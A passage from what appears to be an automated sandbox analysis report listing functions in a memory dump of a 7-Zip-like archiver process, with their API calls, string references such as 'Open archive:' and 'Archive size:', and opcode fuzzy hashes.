                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$freememset
                                              • String ID: ERROR: $WARNING:
                                              • API String ID: 2276422817-2114518728
                                              • Opcode ID: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                              • Instruction ID: ed1a1691bf426fd86f61a441368fc6e81e59500de47df6a4e3159437435dc38a
                                              • Opcode Fuzzy Hash: ecca43dc8351b2c902a0e5034670fe1dd14c0eeed9385964c550ca002694eadf
                                              • Instruction Fuzzy Hash: 1F116352301A4141DA25EB23EA517AE6310E786BE9F48423BEF6F47392DF6CC489C348
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeavefputs
                                              • String ID: ERROR:
                                              • API String ID: 4171338575-977468659
                                              • Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                              • Instruction ID: 07e90e48865beb60c0cfabe2014eccc730fbc496a8d36d12d661171bf855814e
                                              • Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
                                              • Instruction Fuzzy Hash: 2111D07234194191DF05DF36ED413A93321AB8ABA9F0842339F2E4B7A4CF3C8449C318
                                              APIs
                                              • fputs.MSVCRT ref: 0049BC6C
                                              • free.MSVCRT ref: 0049BC78
                                                • Part of subcall function 0049B1C8: memset.MSVCRT ref: 0049B20D
                                                • Part of subcall function 0049B1C8: fputs.MSVCRT ref: 0049B232
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$freememset
                                              • String ID: Archive size: $Files read from disk
                                              • API String ID: 2276422817-3736835528
                                              • Opcode ID: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                              • Instruction ID: 73a9e0b417639b30caa81d8fd224b548c47e228d19c298d17477544d667bc41e
                                              • Opcode Fuzzy Hash: 967efb6c8fd20dc29b92a159685723dba0981b3595675872516f3ccef425e8c4
                                              • Instruction Fuzzy Hash: FD11626320494190CE20EF25E99139D6730E7C57EDF844227EA5D475BADF6CC68EC744
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: a$z
                                              • API String ID: 0-4151050625
                                              • Opcode ID: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                              • Instruction ID: cdf67e42afd8348725766c6255ef571be2273a4299426d39b1ae35265cad0e52
                                              • Opcode Fuzzy Hash: 79b007a773469842fcff8db7cb0bfa3ab41b08846dae76e5ae68771568f84890
                                              • Instruction Fuzzy Hash: C501ADD2B0405591EB247B11AB543FAA252A707B93F8D41338E8907312D1AD49DEE30E
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 1646373207-1489217083
                                              • Opcode ID: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                              • Instruction ID: 4576c568dbe6b0da3e34c6861ca9c4bee2acc1fb20544eafee7f99412d0388b3
                                              • Opcode Fuzzy Hash: 4b5a8e6a765e93aad0567a887158774fb9c1889fb27dd6c52aa472cf121c010a
                                              • Instruction Fuzzy Hash: 09F0A47171450486EB30EB60F4843AE6371AB4831BF840636EB4B82651DB3CC96DCA1D
                                              APIs
                                              • fputs.MSVCRT ref: 0049BACF
                                              • fputs.MSVCRT ref: 0049BAFC
                                                • Part of subcall function 00452320: free.MSVCRT ref: 0045237E
                                                • Part of subcall function 00452320: fputs.MSVCRT ref: 004523B8
                                                • Part of subcall function 00452320: free.MSVCRT ref: 004523C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$free
                                              • String ID: Open archive: $StdOut
                                              • API String ID: 3873070119-2401103298
                                              • Opcode ID: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                              • Instruction ID: ea599559445985496970901d7dbfd63139b368a74e114f900ecca2c6172acc25
                                              • Opcode Fuzzy Hash: 5c408db9bf12223247ae41b3a4b257e588f5b2f357ad56df3248e673553bd93f
                                              • Instruction Fuzzy Hash: 56F0DAE5301D8581DE159F26DA8936E6321EB45FD5F58D433CE0E4BB18DE2CC49E8315
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: fputs$fputc
                                              • String ID: $:
                                              • API String ID: 1185151155-4041779174
                                              • Opcode ID: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                              • Instruction ID: 814bf0a8dde7652c6e04f34b57554f472256cb45bcf3c22c56cfc18cf0e57cfc
                                              • Opcode Fuzzy Hash: 0876c551c5b7590e0ff57701a7544b73fa63f79d82255e9a5707c5629e0c0e90
                                              • Instruction Fuzzy Hash: EAE039D6304A8081CB219B26E95435E6321AB99BCDF488132EE8E07B1A9E6CC148C715
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetLargePageMinimum$kernel32.dll
                                              • API String ID: 1646373207-2515562745
                                              • Opcode ID: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                              • Instruction ID: e0f2216a6a103e259b4208b1915ac5df8663cc938cb4bc59d6eb02de6582fb13
                                              • Opcode Fuzzy Hash: 9cafdcdec884bdbcba65c699ecbd7ef866ca1a9750535094873ebbbe4fc89029
                                              • Instruction Fuzzy Hash: 9CE0B6A4796B01A1EE09DF95FCD53692760AB9AB54F84043A860E82360EF3CC659C31C
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ErrorLast
                                              • String ID:
                                              • API String ID: 408039514-0
                                              • Opcode ID: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                              • Instruction ID: 5660eae6d3b1664c05bd13478ba0e35f299502a850843f7216e7a931686dc02c
                                              • Opcode Fuzzy Hash: eb35eda3f074dfc2ab316374226af9b5045eb8b96d0d247d19b9edefb77cef74
                                              • Instruction Fuzzy Hash: 7D818C32305A4082CB24EF26D55071EB761F789BA8F644616EF9E43B69EF3CC855C704
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                              • Instruction ID: ddf6b7368be4fba02eb0444398cc57249a2e42c5c79dcd9b0aa644ec0e8c44e3
                                              • Opcode Fuzzy Hash: 8b054cff316d6362c540f9b163884723641e5c2bea3e11dd8c59b701f31abf9a
                                              • Instruction Fuzzy Hash: A941E52331568096CF20DE22D55026F6760FBD6BE8F485217EF9907B5AEF2CC586C709
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                              • Instruction ID: 62f147fd259d470578df7a0d0dfc3a3c55667c72517c920c1eede75d1c88a60f
                                              • Opcode Fuzzy Hash: ea4c382c0509df945921f23a34c49439f2ef1336e99032456fda2b95fe78acec
                                              • Instruction Fuzzy Hash: A341E9272096C085CB21EA26E44015FAFA1F3D779CF18421AFF9607B5AC7BED099CB15
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$ErrorLastmemmove
                                              • String ID:
                                              • API String ID: 3561842085-0
                                              • Opcode ID: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                              • Instruction ID: 3e668339c5ac3c446910e1751ddffc01c8d07f4fcde9dad931b669008059291d
                                              • Opcode Fuzzy Hash: fffb23e19f922e00206dffc0701e93bf50c9df1a145a300dd5ae7f7b9b1c6057
                                              • Instruction Fuzzy Hash: 5B319172215A4091CB20EF25E45025E7360EB85BA9F545226BA5E437AADF3CC54ECB08
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free$memmove
                                              • String ID:
                                              • API String ID: 1534225298-0
                                              • Opcode ID: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
                                              • Instruction ID: 97f45dfd93d3d0fb0f450bb1063bcbf4076f077baf7be38bab4ab69a82e663d3
                                              • Opcode Fuzzy Hash: b755f34292b14f3c78f859b325e48777a4122fb93ec97f274d8f258d9deb2584
                                              • Instruction Fuzzy Hash: B7219123711A8496CA14EF57EA4412A7320F745BEAB08813BDF6907796DF78D86AC704
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: memcmp
                                              • String ID:
                                              • API String ID: 1475443563-0
                                              • Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                              • Instruction ID: fb3a720553558c0a5c292b03a798b3c19f79897583d5d2a2350a868b5757a4ed
                                              • Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
                                              • Instruction Fuzzy Hash: 9C1191E234475199EF04EB279C923A92625970AFCAF899036CE0547706EB7CD94AC30D
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00453C2A
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00453C36
                                              • _CxxThrowException.MSVCRT ref: 00453C54
                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00453C80
                                              • _CxxThrowException.MSVCRT ref: 00453C9E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                              • String ID:
                                              • API String ID: 2296236218-0
                                              • Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                              • Instruction ID: d198c79609f297616336ed3c98106ab46bdae09ee7a0a650d94725fb5402334a
                                              • Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
                                              • Instruction Fuzzy Hash: B9218EB3700B4486DB10DF17E85031AB7A1FB88B89F44812ADF4987724EB7CC949C714
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                              • Instruction ID: 503e0d47d10955f042a0c1072dcd54cee895ca31fdb877270448640e1b1e5ca8
                                              • Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
                                              • Instruction Fuzzy Hash: C501C823702D4596DA24EF23D91066A2310F787FA9B184323AF6D077A2CF28D816C708
                                              APIs
                                              • free.MSVCRT ref: 00473877
                                                • Part of subcall function 00470BBC: free.MSVCRT(?,00000010,00000000,00000000,00473885), ref: 00470BCC
                                                • Part of subcall function 00470BBC: free.MSVCRT(?,00000010,00000000,00000000,00473885), ref: 00470BD5
                                                • Part of subcall function 00470BBC: free.MSVCRT(?,00000010,00000000,00000000,00473885), ref: 00470C00
                                                • Part of subcall function 00470BBC: free.MSVCRT(?,00000010,00000000,00000000,00473885), ref: 00470C08
                                                • Part of subcall function 00471474: free.MSVCRT(00000010,00000000,00000000,00000000,0047388E), ref: 004714A6
                                                • Part of subcall function 00471474: free.MSVCRT(00000010,00000000,00000000,00000000,0047388E), ref: 004714AF
                                                • Part of subcall function 00471474: free.MSVCRT(00000010,00000000,00000000,00000000,0047388E), ref: 004714B8
                                                • Part of subcall function 00471474: free.MSVCRT(00000010,00000000,00000000,00000000,0047388E), ref: 004714C0
                                              • free.MSVCRT ref: 00473892
                                              • free.MSVCRT ref: 0047389B
                                              • free.MSVCRT ref: 004738C6
                                              • free.MSVCRT ref: 004738CE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                              • Instruction ID: 2ebd69433c4362bc9059e6c512b9ca42dacac2862fd41c6c01976d9b81c026a8
                                              • Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
                                              • Instruction Fuzzy Hash: CEF0F923713C5096C914FF27DE511AD1310FB86F9A70D4127AF1D0B752DF68D9668348
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                              • Instruction ID: f93187e9c8872a76dbc6662119cd4d3329e2b8c310d997d5cf9ecfa742e6b2ec
                                              • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                              • Instruction Fuzzy Hash: B0F0C213702984898A10EE27DED11AA23109F86BAA70C413BAF1E07706DE68C8468708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                              • Instruction ID: 6c4ec9ced151231c55d376474e4bf4ba34a683f4e5bb2ef2053f9ccf784a1cdd
                                              • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                              • Instruction Fuzzy Hash: 58F0F6537029858DCA10EE27DDC129A2310AF46BAEB0C413BBF1D07746DF68C8868708
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                              • Instruction ID: bc40b5b3967c0205b3294f970ec56567f806f3e9f864640824f24ad8b0130ff1
                                              • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                              • Instruction Fuzzy Hash: F1F09023712C4589CB25AE37DE5112A2320EB96FDA7190167AF2D0B35ADEE8C8468748
                                              APIs
                                              • free.MSVCRT ref: 004976AF
                                              • free.MSVCRT ref: 004976BB
                                              • free.MSVCRT ref: 004976C7
                                              • free.MSVCRT ref: 004976D3
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B335
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B342
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B34E
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B358
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B362
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B36C
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B376
                                                • Part of subcall function 0049B310: free.MSVCRT ref: 0049B380
                                              • free.MSVCRT ref: 004976E4
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2010633393.0000000000451000.00000020.00000001.01000000.00000005.sdmp, Offset: 00450000, based on PE: true
                                              • Associated: 00000005.00000002.2010587207.0000000000450000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010695024.000000000049F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010735839.00000000004BC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 00000005.00000002.2010760120.00000000004BF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_450000_7z.jbxd
                                              Similarity
                                              • API ID: free
                                              • String ID:
                                              • API String ID: 1294909896-0
                                              • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                              • Instruction ID: e8a0770339183b6b78376da448bddbf68fba2c4538c6d525ee4605a12d990891
                                              • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                              • Instruction Fuzzy Hash: 51E0303331294181CA10EF36C9951DD2320E78AB5DF180177AE1D8E362DE58C9478748
